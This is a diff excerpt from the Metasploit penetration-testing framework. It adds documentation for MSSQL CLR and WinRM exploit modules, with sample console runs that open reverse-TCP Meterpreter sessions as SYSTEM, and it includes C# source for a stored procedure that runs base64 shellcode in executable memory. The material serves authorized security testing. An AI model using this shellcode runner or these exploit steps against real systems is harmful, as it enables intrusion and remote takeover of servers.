The module does all of the above, as required. It uploads a .NET Assembly (pre-built, and stored in the `data` folder) which is selected based on the version of the DB in question. This is a shim that exposes a function that allows for a base64-encoded payload to be executed as native shellcode. This function is exposed as a stored proc, which can be called directly through an SQL query with the base64 encoded shellcode.
This module was tested on SQL 2005, 2012 and 2016 (all x64 versions). I haven't tested on x86 yet. there is code in the module that makes sure that the target architecture matches the payload that was chosen.
This code also includes command-line builds for the assembly that is used to provide the code execution function, and can be built in the same way that all the other exploits are built (from a Visual Studio command line).
## Sample Runs:
MS SQL 2005:
```
msf exploit(mssql_clr_payload) > exploit
[*] [2017.02.10-12:56:15] Started reverse TCP handler on 172.16.255.1:4444
[!] [2017.02.10-12:56:15] 172.16.255.130:1433 - Setting EXITFUNC to 'thread' so we don't kill SQL Server
[*] [2017.02.10-12:56:15] 172.16.255.130:1433 - Database does not have TRUSTWORTHY setting on, enabling ...
[*] [2017.02.10-12:56:15] 172.16.255.130:1433 - Database does not have CLR support enabled, enabling ...
[*] [2017.02.10-12:56:15] 172.16.255.130:1433 - Using version v3.5 of the Payload Assembly
[*] [2017.02.10-12:56:15] 172.16.255.130:1433 - Adding custom payload assembly ...
[*] [2017.02.10-12:56:15] 172.16.255.130:1433 - Exposing payload execution stored procedure ...
[*] [2017.02.10-12:56:15] 172.16.255.130:1433 - Executing the payload ...
[*] [2017.02.10-12:56:16] 172.16.255.130:1433 - Removing stored procedure ...
[*] [2017.02.10-12:56:16] 172.16.255.130:1433 - Removing assembly ...
[*] [2017.02.10-12:56:16] Sending stage (1189423 bytes) to 172.16.255.130
[*] [2017.02.10-12:56:16] 172.16.255.130:1433 - Restoring CLR setting ...
[*] [2017.02.10-12:56:16] 172.16.255.130:1433 - Restoring Trustworthy setting ...
[*] Meterpreter session 10 opened (172.16.255.1:4444 -> 172.16.255.130:49168) at 2017-02-10 12:56:18 +1000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-8CT6HVI5D6J
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
```
MS SQL 2016
```
msf exploit(mssql_clr_payload) > exploit
[*] [2017.02.10-12:55:58] Started reverse TCP handler on 172.16.255.1:4444
[!] [2017.02.10-12:55:58] 172.16.255.129:1433 - Setting EXITFUNC to 'thread' so we don't kill SQL Server
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Database does not have TRUSTWORTHY setting on, enabling ...
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Database does not have CLR support enabled, enabling ...
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Using version v4.0 of the Payload Assembly
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Adding custom payload assembly ...
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Exposing payload execution stored procedure ...
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Executing the payload ...
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Removing stored procedure ...
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Removing assembly ...
[*] [2017.02.10-12:55:58] Sending stage (1189423 bytes) to 172.16.255.129
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Restoring CLR setting ...
[*] [2017.02.10-12:55:58] 172.16.255.129:1433 - Restoring Trustworthy setting ...
[*] Meterpreter session 9 opened (172.16.255.1:4444 -> 172.16.255.129:49732) at 2017-02-10 12:56:00 +1000
meterpreter > getuid
Server username: NT Service\MSSQLSERVER
meterpreter > sysinfo
Computer : WIN-7QEE7C4D0GF
OS : Windows 2016 (Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
```

146
documentation/modules/exploit/winrm/winrm_script_exec.md Normal file
View File

@ -0,0 +1,146 @@
## Vulnerable Application
WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol).
This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return.
## Example Usage
### Windows 2008
**Powershell 2.0 is used for payload delivery here**
```
msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf exploit(winrm_script_exec) > exploit
[*] Started reverse TCP handler on 192.168.198.138:4444
[*] checking for Powershell 2.0
[*] Attempting to set Execution Policy
[+] Set Execution Policy Successfully
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\uFWUOIgQ.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (752128 bytes) to 192.168.198.130
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:30:05 +0100
meterpreter >
[*] Session ID 1 (192.168.198.138:4444 -> 192.168.198.130:5985) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (608)
[+] Migrating to 568
[+] Successfully migrated to process
meterpreter > sysinfo
gComputer : WIN-JZF4OTQMX4W
OS : Windows 2008 (Build 6002, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > getuid
gServer username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 568
meterpreter >
```
**VBS CmdStager is used for payload delivery here**
```
msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf exploit(winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf exploit(winrm_script_exec) > exploit
[*] Started reverse TCP handler on 192.168.198.138:4444
[*] User selected the FORCE_VBS option
[*] Command Stager progress - 2.01% done (2046/101936 bytes)
[*] Command Stager progress - 4.01% done (4092/101936 bytes)
[*] Command Stager progress - 6.02% done (6138/101936 bytes)
[*] Command Stager progress - 8.03% done (8184/101936 bytes)
[*] Command Stager progress - 10.04% done (10230/101936 bytes)
[*] Command Stager progress - 12.04% done (12276/101936 bytes)
[*] Command Stager progress - 14.05% done (14322/101936 bytes)
[*] Command Stager progress - 16.06% done (16368/101936 bytes)
[*] Command Stager progress - 18.06% done (18414/101936 bytes)
[*] Command Stager progress - 20.07% done (20460/101936 bytes)
[*] Command Stager progress - 22.08% done (22506/101936 bytes)
[*] Command Stager progress - 24.09% done (24552/101936 bytes)
[*] Command Stager progress - 26.09% done (26598/101936 bytes)
[*] Command Stager progress - 28.10% done (28644/101936 bytes)
[*] Command Stager progress - 30.11% done (30690/101936 bytes)
[*] Command Stager progress - 32.11% done (32736/101936 bytes)
[*] Command Stager progress - 34.12% done (34782/101936 bytes)
[*] Command Stager progress - 36.13% done (36828/101936 bytes)
[*] Command Stager progress - 38.14% done (38874/101936 bytes)
[*] Command Stager progress - 40.14% done (40920/101936 bytes)
[*] Command Stager progress - 42.15% done (42966/101936 bytes)
[*] Command Stager progress - 44.16% done (45012/101936 bytes)
[*] Command Stager progress - 46.16% done (47058/101936 bytes)
[*] Command Stager progress - 48.17% done (49104/101936 bytes)
[*] Command Stager progress - 50.18% done (51150/101936 bytes)
[*] Command Stager progress - 52.19% done (53196/101936 bytes)
[*] Command Stager progress - 54.19% done (55242/101936 bytes)
[*] Command Stager progress - 56.20% done (57288/101936 bytes)
[*] Command Stager progress - 58.21% done (59334/101936 bytes)
[*] Command Stager progress - 60.21% done (61380/101936 bytes)
[*] Command Stager progress - 62.22% done (63426/101936 bytes)
[*] Command Stager progress - 64.23% done (65472/101936 bytes)
[*] Command Stager progress - 66.24% done (67518/101936 bytes)
[*] Command Stager progress - 68.24% done (69564/101936 bytes)
[*] Command Stager progress - 70.25% done (71610/101936 bytes)
[*] Command Stager progress - 72.26% done (73656/101936 bytes)
[*] Command Stager progress - 74.26% done (75702/101936 bytes)
[*] Command Stager progress - 76.27% done (77748/101936 bytes)
[*] Command Stager progress - 78.28% done (79794/101936 bytes)
[*] Command Stager progress - 80.29% done (81840/101936 bytes)
[*] Command Stager progress - 82.29% done (83886/101936 bytes)
[*] Command Stager progress - 84.30% done (85932/101936 bytes)
[*] Command Stager progress - 86.31% done (87978/101936 bytes)
[*] Command Stager progress - 88.31% done (90024/101936 bytes)
[*] Command Stager progress - 90.32% done (92070/101936 bytes)
[*] Command Stager progress - 92.33% done (94116/101936 bytes)
[*] Command Stager progress - 94.34% done (96162/101936 bytes)
[*] Command Stager progress - 96.34% done (98208/101936 bytes)
[*] Command Stager progress - 98.35% done (100252/101936 bytes)
[*] Sending stage (752128 bytes) to 192.168.198.130
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:46:05 +0100
[*] Session ID 2 (192.168.198.138:4444 -> 192.168.1.142:49158) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: mSPvA.exe (3548)
[+] Migrating to 580
[+] Successfully migrated to process
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
meterpreter > getpid
Current pid: 580
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-OPAUFTQFWTB
OS : Windows 2008 (Build 6002, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >
```

11
documentation/modules/module_doc_template.md
View File

@ -1,14 +1,17 @@
The following is the recommended format for module documentation.
But feel free to add more content/sections to this.
One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
functioning in 5+ years, so giving links or specific examples can be VERY helpful.
## Vulnerable Application
Instructions to get the vulnerable application.
Instructions to get the vulnerable application. If applicable, include links to the vulnerable install files,
as well as instructions on installing/configuring the environment if it is different than a standard install.
Much of this will come from the PR, and can be copy/pasted.
## Verification Steps
Example steps in this format:
Example steps in this format (is also in the PR):
1. Install the application
2. Start msfconsole
@ -20,7 +23,7 @@ But feel free to add more content/sections to this.
**Option name**
Talk about what it does, and how to use it appropriately.
Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
## Scenarios

38
documentation/modules/post/hardware/zigbee/zstumbler.md Normal file
View File

@ -0,0 +1,38 @@
Actively scans the Zigbee channels by sending a beacon broadcast packet and listening for responses.
## Options
**DEVICE**
ZigBee Device ID. Defaults to the target device that is specified via the target command or if
one device is presented when running 'supported_devices' it will use that device.
**CHANNEL**
The channel to scan. Setting this options will prevent the stumbler from changing channels. Range is 11-26, inclusive. Default: not set
n
**LOOP**
How many times to loop over the channels. Specifying a -1 will loop forever. Default: 1
**DELAY**
The delay in seconds to listen to each channel. Default: 2
## Scenarios
Scanning channel 11 for other ZigBee devices in the area.
```
hwbridge > run post/hardware/zigbee/zstumbler channel=11
[*] Scanning Channel 11
[*] New Network: PANID: 0x4724 SOURCE: 0x25D5
[*] Ext PANID: 6E:03:C7:74:31:E2:74:AA Stack Profile: ZigBee Enterprise
[*] Stack Version: ZigBee 2006/2007
[*] Channel: 11
[*] New Network: PANID: 0x4724 SOURCE: 0x7DD1
[*] Ext PANID: 6E:03:C7:74:31:E2:74:AA Stack Profile: ZigBee Enterprise
[*] Stack Version: ZigBee 2006/2007
[*] Channel: 11
```

0
documentation/modules/post/windows/manage/mssql_local_auth_bypass.md Executable file → Normal file
View File

7
documentation/modules/post/windows/manage/priv_migrate.md
View File

@ -14,6 +14,7 @@ This module is a nice addition to the beginning of an autorun script for post-Me
- **ANAME** - This option allows you to specify a system level process that the module attempts to migrate to first if the session has admin rights.
- **NAME** - This option allows you to specify the user level process that the module attempts to migrate to first if the session has user rights or if admin migration fails through all of the default processes.
- **KILL** - This option allows you to kill the original process after a successful migration. The default value is FALSE.
- **NOFAIL** - This option allows you to specify whether or not the module will migrate the session into a user level process if admin level migration fails. If TRUE, this may downgrade priviliged shells. The default value is FALSE.
## Module Process
Here is the process that the module follows:
@ -22,11 +23,13 @@ Here is the process that the module follows:
- If the session has admin rights, it attempts to migrate to a system owned process in the following order:
- ANAME (Module option, if specified)
- services.exe
- winlogon.exe
- wininit.exe
- svchost.exe
- lsm.exe
- lsass.exe
- If it is unable to migrate to one of these processes, it drops to user level migration.
- winlogon.exe
- The module will not migrate if the session has System rights and is already in one of the above target processes.
- If it is unable to migrate to one of these processes, it drops to user level migration if NOFAIL is TRUE.
- If the session has user rights, it attempts to migrate to a user owned process in the following order:
- NAME (Module option, if specified)
- explorer.exe

1
external/source/SqlClrPayload/AssemblyAttributes-v2.0.cs vendored Normal file
View File

@ -0,0 +1 @@
// Deliberately blank

1
external/source/SqlClrPayload/AssemblyAttributes-v3.5.cs vendored Normal file
View File

@ -0,0 +1 @@
// Deliberately blank

3
external/source/SqlClrPayload/AssemblyAttributes-v4.0.cs vendored Normal file
View File

@ -0,0 +1,3 @@
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]

5
external/source/SqlClrPayload/AssemblyAttributes-v4.5.1.cs vendored Normal file
View File

@ -0,0 +1,5 @@
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5.1", FrameworkDisplayName = ".NET Framework 4.5.1")]

4
external/source/SqlClrPayload/AssemblyAttributes-v4.5.2.cs vendored Normal file
View File

@ -0,0 +1,4 @@
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5.2", FrameworkDisplayName = ".NET Framework 4.5.2")]

4
external/source/SqlClrPayload/AssemblyAttributes-v4.5.cs vendored Normal file
View File

@ -0,0 +1,4 @@
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]

3
external/source/SqlClrPayload/AssemblyAttributes-v4.6.1.cs vendored Normal file
View File

@ -0,0 +1,3 @@
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6.1", FrameworkDisplayName = ".NET Framework 4.6.1")]

3
external/source/SqlClrPayload/AssemblyAttributes-v4.6.cs vendored Normal file
View File

@ -0,0 +1,3 @@
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")]

36
external/source/SqlClrPayload/AssemblyInfo.cs vendored Executable file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SqlClrPayload")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SqlClrPayload")]
[assembly: AssemblyCopyright("Copyright © 2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("33827137-7d8c-40e5-afd9-d71e916e0e2d")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

23
external/source/SqlClrPayload/StoredProcedures.cs vendored Executable file
View File

@ -0,0 +1,23 @@
using System;
public partial class StoredProcedures
{
private static Int32 MEM_COMMIT = 0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE = (IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);
[Microsoft.SqlServer.Server.SqlProcedure]
public static void ExecuteB64Payload(string base64EncodedPayload)
{
var bytes = Convert.FromBase64String(base64EncodedPayload);
var mem = VirtualAlloc(IntPtr.Zero,(UIntPtr)bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(bytes, 0, mem, bytes.Length);
var threadId = IntPtr.Zero;
CreateThread(IntPtr.Zero, UIntPtr.Zero, mem, IntPtr.Zero, 0, ref threadId);
}
}

Some files were not shown because too many files have changed in this diff Show More